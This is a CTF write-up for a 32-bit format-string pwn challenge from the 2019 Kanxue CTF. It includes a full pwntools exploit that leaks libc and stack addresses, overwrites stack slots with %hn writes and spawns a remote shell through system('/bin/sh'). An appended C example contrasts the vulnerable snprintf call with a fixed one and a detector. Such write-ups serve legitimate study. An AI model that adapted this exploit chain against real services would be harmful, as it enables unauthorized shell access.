[Original] [2019 看雪 CTF] Q2 Season, Challenge 3: 金字塔的诅咒 (Curse of the Pyramid) Write-up

2019-7-2 00:12
This challenge is a relatively simple fmt-type (format string) pwn (the only pwn challenge of this season on libc 2.23).
Because the target is a 32-bit ELF, everything is much simpler; there are only two small restrictions: first, the input is stored in .bss and PIE is enabled; second, each input must be no longer than 24 bytes.
The rough idea (everything is done through the fmt bug): leak the libc address and a stack address from the stack (the stack holds the ebp chain, and once you have a stack pointer you naturally have a stack address); the stack pointer in the ebp chain can then be used to forge pointers to other stack slots, which gives arbitrary write on the stack; finally, build a system ROP chain on the stack to get a shell.
The final exploit is as follows:
#!/usr/bin/env python
from pwn import *

# pwntools I/O shorthands
s = lambda a: io.send(a)
sa = lambda a, b: io.sendafter(a, b)
st = lambda a, b: io.sendthen(a, b)
sl = lambda a: io.sendline(a)
sla = lambda a, b: io.sendlineafter(a, b)
slt = lambda a, b: io.sendlinethen(a, b)
r = lambda a=0x100: io.recv(a)
rl = lambda: io.recvline()
ru = lambda a: io.recvuntil(a)
it = lambda: io.interactive()

def pwn():
    #flag{c6671fc0-cea3-42ef-8af0-c20c65f854be}
    # libc 2.23 offsets: __libc_start_main, "/bin/sh", system
    libc_main_off = 0x18540
    bin_off = 0x15902B
    sys_off = 0x3A940
    # alternative offsets for another libc build
    # libc_main_off = 0x18540
    # bin_off = 0x15BA0B
    # sys_off = 0x3Ada0

    # leak: arg 11 is the return address into __libc_start_main (+247),
    # arg 5 is a saved ebp, i.e. a stack address
    sla('Choice:','1')
    sla('to say:','%11$p%5$p')
    res = rl()
    libc_main_addr = int(res[2:10],16) - 247
    stack_addr = int(res[12:20],16)
    sys_addr = libc_main_addr - libc_main_off + sys_off
    bin_addr = libc_main_addr - libc_main_off + bin_off
    log.info('sys addr :'+hex(sys_addr))

    # each 16-bit write takes two inputs (each under 24 bytes):
    # first retarget the ebp-chain slot (arg 5) at the stack slot to write,
    # then write the half-word through arg 53 with %hn
    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((sys_addr)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98+2)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((sys_addr>>16)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((bin_addr)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90+2)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((bin_addr>>16)&0xffff))
    # gdb.attach(io,'b main')

    # option 2 leaves the menu, returning into the forged stack frame
    sla('Choice:','2')
    it()

if __name__ == '__main__':
    context(arch='i386', kernel='i386', os='linux')
    HOST, PORT = '152.136.18.34', 9999
    # elf = ELF('./libc.so.6')
    if len(sys.argv) > 1 and sys.argv[1] == 'l':
        io = process('./format')#,env = {'LD_PRELOAD':'./libc.so.6'})
        context.log_level = 'debug'
    else:
        io = remote(HOST, PORT)
        # context.log_level = 'debug'
    pwn()
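As an added example that is not part of the original write-up and not the challenge's source: the C pattern behind a fmt-type pwn, which is what makes the "%11$p" leak and the "%hn" writes above possible, shown beside the hardened form and a small check a defender can apply at the input boundary. The function names are hypothetical.

```c
/* Added example (not the challenge binary or the author's exploit).
 * Shows the format-string misuse, its fix, and a defensive check. */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: the user's message becomes the *format* argument.
 * Directives such as "%11$p" then read the caller's stack (the leak used
 * in the write-up) and "%hn" writes to whatever pointer sits at that
 * argument position. Kept only for contrast; it is never called here. */
int vulnerable_say(char *out, size_t outlen, const char *msg)
{
    return snprintf(out, outlen, msg);   /* msg interpreted as a format */
}

/* Hardened form: fixed format string, the message is only ever data. */
int safe_say(char *out, size_t outlen, const char *msg)
{
    return snprintf(out, outlen, "%s", msg);
}

/* Self-check: the hardened path must reproduce msg byte-for-byte,
 * conversion directives included. Returns 1 on success. */
int safe_say_is_literal(const char *msg)
{
    char out[256];
    return safe_say(out, sizeof out, msg) == (int)strlen(msg)
        && strcmp(out, msg) == 0;
}

/* Defensive check for an input boundary or a detection rule: how many
 * conversion directives does the message contain? "%%" is a literal
 * percent sign and is not counted. A non-zero result on a field that
 * should be plain text is a strong signal of format-string probing. */
int count_format_directives(const char *msg)
{
    int n = 0;
    for (const char *p = msg; *p; p++) {
        if (*p == '%') {
            if (p[1] == '%') { p++; continue; }
            n++;
        }
    }
    return n;
}

int main(void)
{
    /* constructed sample inputs */
    const char *probe = "%11$p%5$p";      /* the leak input from the write-up */
    const char *plain = "hello, 100%% sure";

    printf("literal round-trip: %d\n", safe_say_is_literal(probe));
    printf("directives in probe: %d\n", count_format_directives(probe));
    printf("directives in plain: %d\n", count_format_directives(plain));
    return 0;
}
```

Compiling the vulnerable function with -Wformat-security makes the compiler flag the non-literal format, which is the cheapest way to find this class of bug in a code base.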